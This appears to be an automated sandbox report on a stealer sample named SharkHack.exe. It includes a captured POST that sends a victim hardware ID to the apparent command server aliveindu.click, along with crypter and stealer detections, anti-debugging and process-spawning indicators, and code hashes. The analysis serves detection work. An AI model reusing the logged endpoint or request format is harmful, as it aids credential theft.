                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 32 63 65 65 0d 0a 6c 48 32 75 66 46 69 70 74 4f 31 67 4e 4f 79 2b 56 39 55 4c 7a 39 62 55 2f 52 67 75 4e 41 69 36 35 63 39 2f 6e 73 61 43 68 74 4d 78 69 59 72 70 4b 58 6d 31 6a 57 51 67 32 42 70 44 55 54 72 75 39 71 4b 62 2f 33 6f 68 6a 65 37 68 32 62 32 4b 56 72 5a 58 31 6b 55 59 62 31 30 59 76 56 42 34 42 46 51 4e 4f 35 63 30 69 42 72 47 56 58 76 70 37 34 44 5a 69 68 54 4a 44 6c 72 48 39 76 62 57 49 4e 37 66 72 66 67 38 77 52 31 6b 74 4f 6c 66 5a 72 51 76 61 73 4b 51 62 42 69 4f 68 48 67 36 78 66 38 72 62 77 62 69 5a 69 4d 31 61 4b 75 49 44 4c 6d 78 4c 57 58 55 37 55 74 53 45 43 76 75 38 37 46 4d 62 75 68 6a 76 66 2f 77 6d 69 39 75 42 66 59 32 39 30 41 49 53 67 33 63 57 44 4f 64 5a 4e 54 71 7a 34 63 77 6a 34 74 47 30 69 67 74 36 32 45 73 37 6f 51 59 76
                                                                                                        Data Ascii: 2ceelH2ufFiptO1gNOy+V9ULz9bU/RguNAi65c9/nsaChtMxiYrpKXm1jWQg2BpDUTru9qKb/3ohje7h2b2KVrZX1kUYb10YvVB4BFQNO5c0iBrGVXvp74DZihTJDlrH9vbWIN7frfg8wR1ktOlfZrQvasKQbBiOhHg6xf8rbwbiZiM1aKuIDLmxLWXU7UtSECvu87FMbuhjvf/wmi9uBfY290AISg3cWDOdZNTqz4cwj4tG0igt62Es7oQYv
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 43 6b 39 41 4e 69 67 69 73 57 63 41 34 51 58 43 4a 43 67 4d 46 65 47 30 67 6f 5a 68 74 47 75 42 63 2f 32 4d 70 76 7a 6f 58 39 6d 66 47 56 52 69 71 36 53 69 70 74 59 72 30 56 47 30 34 6c 39 55 4b 43 73 64 56 65 30 30 37 59 62 33 2b 38 64 36 4d 47 73 64 6d 6c 74 59 31 66 46 6f 4a 7a 46 33 55 44 4f 56 30 44 54 73 69 4a 51 34 4c 78 2f 54 4e 53 44 37 30 57 4b 35 6b 4b 38 70 72 51 78 4d 43 6b 39 41 4e 69 67 69 73 57 63 41 34 51 58 43 4a 43 67 4d 46 65 47 30 67 6f 5a 68 74 47 75 42 63 2f 32 51 34 76 51 67 30 39 57 62 6e 42 4f 78 4f 66 45 6c 4a 74 4f 31 67 70 4f 79 34 39 7a 57 50 6a 54 59 31 65 5a 6b 4f 42 56 37 66 6f 43 71 2b 47 30 59 43 56 63 66 55 66 4c 39 73 4b 53 31 45 2b 34 4d 79 2f 54 2b 48 4d 57 2b 4c 52 2f 57 63 48 55 71 56 57 41 71 56 37 2b 73 2f 45 6d
                                                                                                        Data Ascii: Ck9ANigisWcA4QXCJCgMFeG0goZhtGuBc/2MpvzoX9mfGVRiq6SiptYr0VG04l9UKCsdVe007Yb3+8d6MGsdmltY1fFoJzF3UDOV0DTsiJQ4Lx/TNSD70WK5kK8prQxMCk9ANigisWcA4QXCJCgMFeG0goZhtGuBc/2Q4vQg09WbnBOxOfElJtO1gpOy49zWPjTY1eZkOBV7foCq+G0YCVcfUfL9sKS1E+4My/T+HMW+LR/WcHUqVWAqV7+s/Em


Session ID: 2
Source IP: 192.168.2.4
Source Port: 50015
Destination IP: 104.21.64.143
Destination Port: 443

Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:47:03 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9WGSI9MA6J92
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18126
Host: aliveindu.click
2024-12-30 17:47:03 UTC | 15331 | OUT | Data Ascii: --9WGSI9MA6J92Content-Disposition: form-data; name="hwid"DACC3F8FEE3E081920A4C476FD51BCB1--9WGSI9MA6J92Content-Disposition: form-data; name="pid"2--9WGSI9MA6J92Content-Disposition: form-data; name="lid"bFcGh6--2912--9WGSI9MA6J92C
2024-12-30 17:47:03 UTC | 2795 | OUT | Data Raw: (non-printable binary payload, not reproduced)


                                                                                                        Target ID:0
                                                                                                        Start time:12:44:56
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Users\user\Desktop\SharkHack.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\SharkHack.exe"
                                                                                                        Imagebase:0xf00000
                                                                                                        File size:7'181'824 bytes
                                                                                                        MD5 hash:AF8F4B24943A56C36283C58AF92A66D2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2875564569.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2860912420.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:12:45:43
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0x2b0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:12:45:46
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0x4d0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:12:45:49
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0xfc0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000007.00000002.2903541486.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:12:46:22
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0xff0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:10
                                                                                                        Start time:12:46:27
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                        Imagebase:0xe60000
                                                                                                        File size:43'008 bytes
                                                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        Target ID:13
                                                                                                        Start time:12:46:56
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:483'680 bytes
                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:27.7%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:5.5%
                                                                                                          Total number of Nodes:164
                                                                                                          Total number of Limit Nodes:10

                                                                                                          Control-flow Graph (rendered in the report; the "Executed" / "Not Executed" block colouring is not recoverable from the serialized edge list, which is summarised here)
                                                                                                          Function entry 59d0006: basic blocks span 59d0006-59d02ec. The block at 59d00b6 is a multi-way dispatch with fourteen successors, each of which returns to the loop head at 59d0098-59d00a7; the block at 59d01f0 contains a call that resolves to 59d0338 or 59d0348.
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: e\1$e\1$e\1$"*p$"*p
                                                                                                          • API String ID: 0-3583356755
                                                                                                          • Opcode ID: 77b5f9b4c46433b453157c345a9417f815489845793cd636f5f92e1a478ed935
                                                                                                          • Instruction ID: 9302f5be4b7893806d7a48841d36f88323fa7ac7df14768b193f6b3af76a3c6e
                                                                                                          • Opcode Fuzzy Hash: 77b5f9b4c46433b453157c345a9417f815489845793cd636f5f92e1a478ed935
                                                                                                          • Instruction Fuzzy Hash: 309134B4D052589FCB04CFA5D9486EEFBF2BF89300F24886AD416BB250E7745A06CF65

                                                                                                          Control-flow Graph (rendered in the report; "Executed" / "Not Executed" colouring not recoverable from the serialized edge list, which is summarised here)
                                                                                                          Function entry 59d0040: the same block set as the entry at 59d0006 above, starting from 59d0040-59d005e; blocks span 59d0040-59d02ec, with the fourteen-way dispatch at 59d00b6 returning to the loop head at 59d0098-59d00a7 and the call at 59d01f0 resolving to 59d0338 or 59d0348.
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: e\1$e\1$e\1$"*p$"*p
                                                                                                          • API String ID: 0-3583356755
                                                                                                          • Opcode ID: 700bcf3f276d8bf7abb27e8e7f53b732079c6978bf00e8f0863fbb25c2a95f62
                                                                                                          • Instruction ID: a5fc0905d1ac9373cebbc92c649b7931321f1a3d8f23bf64654a6b58c7e50f4c
                                                                                                          • Opcode Fuzzy Hash: 700bcf3f276d8bf7abb27e8e7f53b732079c6978bf00e8f0863fbb25c2a95f62
                                                                                                          • Instruction Fuzzy Hash: 378101B0D052199FCB58CFA5D9486AEFBF2BF88300F24982AD416BB254E7745A05CF64

                                                                                                          Control-flow Graph (rendered in the report; "Executed" / "Not Executed" colouring not recoverable from the serialized edge list, which is summarised here)
                                                                                                          Function entry 8744d2b: basic blocks span 8744d2b-874aa04 and are unusually large straight-line runs (for example 8745fee-8746f63, 87481ee-874916d, 8749a8f-874a9f7); the call at 874a9f7 resolves to 874c340 or 874c2f8.
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0260e2097f08e3d36634453433b5d91a75ba84235a0b89fd54a2e4af7af53a0c
                                                                                                          • Instruction ID: 42cad2c2dec1edff33952a0b7cbc906b704d0288e6ad0b8849dd6c2ed54a3c14
                                                                                                          • Opcode Fuzzy Hash: 0260e2097f08e3d36634453433b5d91a75ba84235a0b89fd54a2e4af7af53a0c
                                                                                                          • Instruction Fuzzy Hash: 40B30874A41229CBDB54EF78E98469CBBF2EB89214F4084EED049A7354DF349E89CF41

                                                                                                          Control-flow Graph (rendered in the report; "Executed" / "Not Executed" colouring not recoverable from the serialized edge list, which is summarised here)
                                                                                                          Function entry 8744d40: the same block set as the entry at 8744d2b above, starting from 8744d40-8744f79; blocks span 8744d40-874aa04, with the call at 874a9f7 resolving to 874c340 or 874c2f8.
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1e7bd1d8508bd7cea27af80851fbfd48d35aa01e01c8924b169ec463e2a192f
                                                                                                          • Instruction ID: 4f88f32dc3c0e6e928085d4c873e7a334a01bf2a9810fd7637beb15c5e5566e0
                                                                                                          • Opcode Fuzzy Hash: c1e7bd1d8508bd7cea27af80851fbfd48d35aa01e01c8924b169ec463e2a192f
                                                                                                          • Instruction Fuzzy Hash: 6EB30874A41229CBDB54EF78E98469CBBF2EB89214F4084EED049A7354DF349E89CF41

                                                                                                          Control-flow Graph (rendered in the report; "Executed" / "Not Executed" colouring not recoverable from the serialized edge list, which is summarised here)
                                                                                                          Function entry 1f97630: basic blocks span 1f97630-1f97b9e. The call at 1f97668 resolves to 1f97009 or to 1f97630 itself (a self-reference), and the call at 1f97a75 resolves to 1f97d58 or 1f97c58.
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851633688.0000000001F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1f90000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (o^q$(o^q$,bq$,bq
                                                                                                          • API String ID: 0-879173519
                                                                                                          • Opcode ID: 0d7bf67f473c37c837b50a80ea5a37decf7cc2551e2369919e3db481bd602aaf
                                                                                                          • Instruction ID: c12d2eb566bb564315215322d5f9f4c090557a80421b5f37c9868d8ad20a0e15
                                                                                                          • Opcode Fuzzy Hash: 0d7bf67f473c37c837b50a80ea5a37decf7cc2551e2369919e3db481bd602aaf
                                                                                                          • Instruction Fuzzy Hash: 3D024C71E10209DFEF15EFA9C884AADBBB2FF88300F188565E505AB261D736E941CF51

                                                                                                          Control-flow Graph (rendered in the report; "Executed" / "Not Executed" colouring not recoverable from the serialized edge list, which is summarised here)
                                                                                                          Function entry 8ef47e0: a single block 8ef47e0-8ef9fe8 calling 8efae30, 8efb0d9 and 8efb830 in turn (the execution graph shows 8efb830 reaching DeleteFileW), followed by the exit block 8ef9fee-8ef9ff5.
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d74219a1565049d83e4d60e0578bc37a628c1467a160a4fb304b74fea1e2cad
                                                                                                          • Instruction ID: 56b5bd8bbd58ff08a3f72768ff87533e69e394f765557c6ffa2517cd86b0495c
                                                                                                          • Opcode Fuzzy Hash: 8d74219a1565049d83e4d60e0578bc37a628c1467a160a4fb304b74fea1e2cad
                                                                                                          • Instruction Fuzzy Hash: 14B31B70A11228CBC754EF39EA8469CBBF2FB89214F4084EAD48CA7351DE349D89DF55
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$G
                                                                                                          • API String ID: 0-2525716807
                                                                                                          • Opcode ID: ba5593723e3d2635168a40be8621a69752313a72ba3590a1c578f6b3ec84943a
                                                                                                          • Instruction ID: 376e2fce8b8cd9b35746c1ada8719a6ca7367ae768aa5a5375faa38b81e5d7a0
                                                                                                          • Opcode Fuzzy Hash: ba5593723e3d2635168a40be8621a69752313a72ba3590a1c578f6b3ec84943a
                                                                                                          • Instruction Fuzzy Hash: B7D29E30A08314CFD705AF78D8947ADBBB1FF89714F4185EAD488E7291DA389D4ACB52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6f$6f$$^q
                                                                                                          • API String ID: 0-2554587936
                                                                                                          • Opcode ID: f9d2cebea98846a1ade9eebd82f19607f7921cdd4952433cc36f607fa1181af7
                                                                                                          • Instruction ID: 815b56d8fc03eaf6367d6850e9266e347ec5c38cd9f688422f5077b1175b7b7a
                                                                                                          • Opcode Fuzzy Hash: f9d2cebea98846a1ade9eebd82f19607f7921cdd4952433cc36f607fa1181af7
                                                                                                          • Instruction Fuzzy Hash: DC71C074E00208DFDB58DFA5D98459EBBB2FF88301F20842AD50ABB394DB359946CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 56d9e252ce734f77afb1ff42c440e0dfd51b3ea7e69887b3a3c5e093669c195e
• Instruction ID: 886a6e64828e4fec6d2ed9184776e724250accb63f7aa56fe730955990e293f9
• Opcode Fuzzy Hash: 56d9e252ce734f77afb1ff42c440e0dfd51b3ea7e69887b3a3c5e093669c195e
• Instruction Fuzzy Hash: C4538E70A15625CBC714EF78DD8479DBBB5FF89304F4084E9D088A7251DA38AE8ACF16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2851633688.0000000001F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1f90000_SharkHack.jbxd
Similarity
• API ID:
• String ID: (o^q$Hbq
• API String ID: 0-662517225
• Opcode ID: a1bc8486d41719a9ef5a8699a6d979bc3bb2973c45114c1214c445d3f4255182
• Instruction ID: b6ae7436ea53c017f810103c801fe9d403c4670f57d9988b295030235571857f
• Opcode Fuzzy Hash: a1bc8486d41719a9ef5a8699a6d979bc3bb2973c45114c1214c445d3f4255182
• Instruction Fuzzy Hash: AA129F71A00219DFDB14EFA9C854AAEBBF6BF88300F148569E905DB391EB319D41CF90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: 32a542f9bcbce97c9f6a9f1bc24c53cbc3c04152187f8e3d4d82244a9214ccc7
• Instruction ID: 44306daf4ba364ac848e915959a52e803121fa87ea563a180944908958b89b0e
• Opcode Fuzzy Hash: 32a542f9bcbce97c9f6a9f1bc24c53cbc3c04152187f8e3d4d82244a9214ccc7
• Instruction Fuzzy Hash: A7A12774E05209CFCB08CFAAD5886ADFBB2FB89310F10D52AD816BB254EB705945CF24
Strings
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: d7b80b4f7d6c3695738cc78e4145760e243a9473f50127eb3a565611feda5ad9
• Instruction ID: 3b16e1c342ea938b0730aec27d620b992d80113aba98fcad64f4afaaa299112a
• Opcode Fuzzy Hash: d7b80b4f7d6c3695738cc78e4145760e243a9473f50127eb3a565611feda5ad9
• Instruction Fuzzy Hash: B4A11874E05249CFCB08CFAAD588A9DFBB2FB89310F10D52AD806BB254EB745945CF25
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: Te^q$Te^q
• API String ID: 0-3743469327
• Opcode ID: a581c3860b65bde93d70f036a64ee3a50c2c34d11f713d6e5070ab65ba2a24f5
• Instruction ID: 5d90ce5ab4fee63feb5a1bc10de6b7e7e1b193d189b39917dd67b59e95d17496
• Opcode Fuzzy Hash: a581c3860b65bde93d70f036a64ee3a50c2c34d11f713d6e5070ab65ba2a24f5
• Instruction Fuzzy Hash: 7D91F274E042498FDB08DFA9C8849DEBBB2FF88301F24942AD416BB365D7359906CF55
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: Te^q$Te^q
• API String ID: 0-3743469327
• Opcode ID: e761654ada1996030e01d15e032c1169934a10266aadabd91ea0f73a73614b22
• Instruction ID: db135a254a93075e409685224ee6ab955aa6e6eeac7f7c906b56d0095e735808
• Opcode Fuzzy Hash: e761654ada1996030e01d15e032c1169934a10266aadabd91ea0f73a73614b22
• Instruction Fuzzy Hash: B891D274E042098FDB08DFAAC884ADEBBB2FF88300F24942AD416BB364D7759905CF55
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: 6f$$^q
• API String ID: 0-857817941
• Opcode ID: 4515aaf9456130c49d5fbe78ff4311a4be434391a5a19d90d3ae5eeb9d324287
• Instruction ID: 6d2b441649554c23c97fd92be04ffbe6580e10200b7ca8c7f158c945e9cba58a
• Opcode Fuzzy Hash: 4515aaf9456130c49d5fbe78ff4311a4be434391a5a19d90d3ae5eeb9d324287
• Instruction Fuzzy Hash: F371D174E00208DFDB48DFA5D98459EBBB2FF88301F20842AD50AAB398DB319946CF51
APIs
• CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 089CFDAB
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 88cef21857bee950b92750f7e52925cc21658525b06498134820a00838621d11
• Instruction ID: 421dd87a6c70aebfe05c884295ce6d25430c55db2651cb9c2aa96693428c6e1a
• Opcode Fuzzy Hash: 88cef21857bee950b92750f7e52925cc21658525b06498134820a00838621d11
• Instruction Fuzzy Hash: 7A510871D00229DFDB24DF99C840BDDBBB6BF48314F1484AAE818B7250DB759A89CF90
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060209B7
Memory Dump Source
• Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 7f3fbbf681a3b21376987bb8680ab8eb1496d397209efd09125b7db6f4535aaa
• Instruction ID: bf738c195c8351f93ec68b5ff7067c198386fd65ea4be7606558088d3b73f0d2
• Opcode Fuzzy Hash: 7f3fbbf681a3b21376987bb8680ab8eb1496d397209efd09125b7db6f4535aaa
• Instruction Fuzzy Hash: A32148B1C01259CFDB10CF9AD444BEEBBF4EF48320F14842AE455A3251C738A944CFA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: kQD
• API String ID: 0-3066535408
• Opcode ID: 108195c5fa6192a9843a5eccb284f8f78fbf6dcf2af81abea2c501c63624a460
• Instruction ID: b3e05b72b1f5af8ae6668bdaa308905bd60f1af2d2394a040e4cfe60c7f96b8b
• Opcode Fuzzy Hash: 108195c5fa6192a9843a5eccb284f8f78fbf6dcf2af81abea2c501c63624a460
• Instruction Fuzzy Hash: 06D18C74E0520ADFCB04DFA9C4848AEFBB2FF89301B14D569D405AB315D735A982DF92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: kQD
• API String ID: 0-3066535408
• Opcode ID: 61a008573a13ec67229da5be35ddba167095dd93fd98a29f525996ac90e54bb0
• Instruction ID: d815a39bcd3d24963450135b3974db470174d220f120c141fbc22a99ca8e54c6
• Opcode Fuzzy Hash: 61a008573a13ec67229da5be35ddba167095dd93fd98a29f525996ac90e54bb0
• Instruction Fuzzy Hash: DFC17B74E0420ADFCB08DFA9C4848AEFBB2FF89301B14D559D415AB314D735AA82DF95
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
